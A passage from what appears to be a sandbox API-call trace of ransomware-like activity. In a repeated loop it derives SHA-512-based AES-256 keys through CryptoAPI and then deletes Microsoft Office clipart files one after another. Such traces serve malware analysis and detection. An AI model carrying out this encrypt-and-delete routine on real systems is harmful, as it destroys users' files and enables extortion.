phHash=0x1d444734) returned 1 [0193.321] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.321] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad6b8) returned 1 [0193.321] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.321] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.321] wcslen (_String="\\\\?\\") returned 0x4 [0193.350] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 1 [0193.351] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf")) returned 1 [0193.352] CryptDestroyKey (hKey=0x9ad878) returned 1 [0193.352] wcslen (_String="OK") returned 0x2 [0193.352] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.352] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.352] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0193.352] CryptDestroyHash (hHash=0x9ad738) returned 1 [0193.352] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0193.355] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0193.355] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.355] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad438) returned 1 [0193.355] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.355] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.355] wcslen (_String="\\\\?\\") returned 0x4 [0193.426] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 1 [0193.426] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf")) returned 1 [0193.428] CryptDestroyKey (hKey=0x9ad338) returned 1 [0193.428] wcslen (_String="OK") returned 0x2 [0193.428] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.428] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.428] CryptDestroyKey (hKey=0x9ad438) returned 1 [0193.428] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0193.428] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0193.430] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0193.430] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.430] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad7f8) returned 1 [0193.430] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.430] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.430] wcslen (_String="\\\\?\\") returned 0x4 [0193.552] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 1 [0193.552] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf")) returned 1 [0193.553] CryptDestroyKey (hKey=0x9ad278) returned 1 [0193.553] wcslen (_String="OK") returned 0x2 [0193.553] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.553] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.553] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0193.553] CryptDestroyHash (hHash=0x9ad438) returned 1 [0193.553] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0193.555] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0193.555] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.555] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad438) returned 1 [0193.555] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.555] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.555] wcslen (_String="\\\\?\\") returned 0x4 [0193.624] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 1 [0193.624] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf")) returned 1 [0193.627] CryptDestroyKey (hKey=0x9ad738) returned 1 [0193.627] wcslen (_String="OK") returned 0x2 [0193.627] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.627] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.627] CryptDestroyKey (hKey=0x9ad438) returned 1 [0193.627] CryptDestroyHash (hHash=0x9ad138) returned 1 [0193.627] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0193.629] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0193.629] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.629] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad278) returned 1 [0193.629] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.629] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.629] wcslen (_String="\\\\?\\") returned 0x4 [0193.731] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 1 [0193.731] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf")) returned 1 [0193.732] CryptDestroyKey (hKey=0x9ad378) returned 1 [0193.732] wcslen (_String="OK") returned 0x2 [0193.732] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.732] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.732] CryptDestroyKey (hKey=0x9ad278) returned 1 [0193.732] CryptDestroyHash (hHash=0x9ad878) returned 1 [0193.732] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0193.735] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0193.735] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.735] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad838) returned 1 [0193.735] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.735] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.735] wcslen (_String="\\\\?\\") returned 0x4 [0193.747] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 1 [0193.747] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf")) returned 1 [0193.749] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0193.749] wcslen (_String="OK") returned 0x2 [0193.749] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.749] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.749] CryptDestroyKey (hKey=0x9ad838) returned 1 [0193.749] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0193.749] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0193.752] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44492c | out: phHash=0x1d44492c) returned 1 [0193.752] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.752] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444930 | out: phKey=0x1d444930*=0x9ad7f8) returned 1 [0193.752] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.752] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.752] wcslen (_String="\\\\?\\") returned 0x4 [0193.994] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 1 [0193.994] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf")) returned 1 [0193.995] CryptDestroyKey (hKey=0x9ad478) returned 1 [0193.995] wcslen (_String="OK") returned 0x2 [0193.995] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.995] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0193.995] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0193.995] CryptDestroyHash (hHash=0x9ad178) returned 1 [0193.995] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0193.996] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0193.996] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0193.997] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad838) returned 1 [0193.997] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0193.997] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0193.997] wcslen (_String="\\\\?\\") returned 0x4 [0194.123] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 1 [0194.124] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf")) returned 1 [0194.125] CryptDestroyKey (hKey=0x9ad138) returned 1 [0194.125] wcslen (_String="OK") returned 0x2 [0194.125] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.125] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.125] CryptDestroyKey (hKey=0x9ad838) returned 1 [0194.125] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0194.125] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0194.126] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0194.126] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.126] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad178) returned 1 [0194.126] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0194.126] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0194.126] wcslen (_String="\\\\?\\") returned 0x4 [0194.323] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 1 [0194.323] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf")) returned 1 [0194.324] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0194.324] wcslen (_String="OK") returned 0x2 [0194.324] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.324] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.324] CryptDestroyKey (hKey=0x9ad178) returned 1 [0194.324] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0194.324] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0194.327] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449bc | out: phHash=0x1d4449bc) returned 1 [0194.327] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.327] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4449c0 | out: phKey=0x1d4449c0*=0x9ad138) returned 1 [0194.327] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0194.327] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0194.327] wcslen (_String="\\\\?\\") returned 0x4 [0194.607] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 1 [0194.607] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf")) returned 1 [0194.608] CryptDestroyKey (hKey=0x9ad378) returned 1 [0194.608] wcslen (_String="OK") returned 0x2 [0194.608] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.608] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.608] CryptDestroyKey (hKey=0x9ad138) returned 1 [0194.608] CryptDestroyHash (hHash=0x9ad338) returned 1 [0194.608] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0194.611] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0194.611] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.611] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad378) returned 1 [0194.611] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0194.611] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0194.611] wcslen (_String="\\\\?\\") returned 0x4 [0194.622] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 1 [0194.622] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf")) returned 1 [0194.623] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0194.623] wcslen (_String="OK") returned 0x2 [0194.623] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.623] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.623] CryptDestroyKey (hKey=0x9ad378) returned 1 [0194.623] CryptDestroyHash (hHash=0x9ad678) returned 1 [0194.623] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0194.626] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0194.626] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.626] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad138) returned 1 [0194.626] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0194.626] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0194.627] wcslen (_String="\\\\?\\") returned 0x4 [0194.675] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 1 [0194.676] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf")) returned 1 [0194.676] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0194.676] wcslen (_String="OK") returned 0x2 [0194.676] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.676] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.677] CryptDestroyKey (hKey=0x9ad138) returned 1 [0194.677] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0194.677] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0194.678] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0194.678] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.678] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad538) returned 1 [0194.678] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0194.678] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0194.678] wcslen (_String="\\\\?\\") returned 0x4 [0194.724] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 1 [0194.724] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf")) returned 1 [0194.726] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0194.726] wcslen (_String="OK") returned 0x2 [0194.726] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.726] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.726] CryptDestroyKey (hKey=0x9ad538) returned 1 [0194.726] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0194.726] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0194.728] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0194.728] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.729] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad2f8) returned 1 [0194.729] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0194.729] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0194.729] wcslen (_String="\\\\?\\") returned 0x4 [0194.746] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 1 [0194.747] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf")) returned 1 [0194.748] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0194.748] wcslen (_String="OK") returned 0x2 [0194.748] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.748] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0194.748] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0194.748] CryptDestroyHash (hHash=0x9ad578) returned 1 [0194.748] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0194.750] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0194.750] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.750] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad438) returned 1 [0194.750] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0194.750] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0194.750] wcslen (_String="\\\\?\\") returned 0x4 [0195.080] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 1 [0195.080] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf")) returned 1 [0195.081] CryptDestroyKey (hKey=0x9ad478) returned 1 [0195.081] wcslen (_String="OK") returned 0x2 [0195.081] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.082] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.082] CryptDestroyKey (hKey=0x9ad438) returned 1 [0195.082] CryptDestroyHash (hHash=0x9ad178) returned 1 [0195.082] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0195.084] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0195.084] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.084] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad2f8) returned 1 [0195.084] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.084] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.084] wcslen (_String="\\\\?\\") returned 0x4 [0195.298] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 1 [0195.298] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf")) returned 1 [0195.299] CryptDestroyKey (hKey=0x9ad578) returned 1 [0195.299] wcslen (_String="OK") returned 0x2 [0195.299] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.299] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.299] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0195.299] CryptDestroyHash (hHash=0x9ad378) returned 1 [0195.299] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0195.301] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0195.301] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.301] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad738) returned 1 [0195.301] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.301] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.301] wcslen (_String="\\\\?\\") returned 0x4 [0195.405] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 1 [0195.405] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf")) returned 1 [0195.407] CryptDestroyKey (hKey=0x9ad578) returned 1 [0195.407] wcslen (_String="OK") returned 0x2 [0195.407] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.407] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.407] CryptDestroyKey (hKey=0x9ad738) returned 1 [0195.407] CryptDestroyHash (hHash=0x9ad438) returned 1 [0195.407] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0195.421] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0195.422] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.422] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, 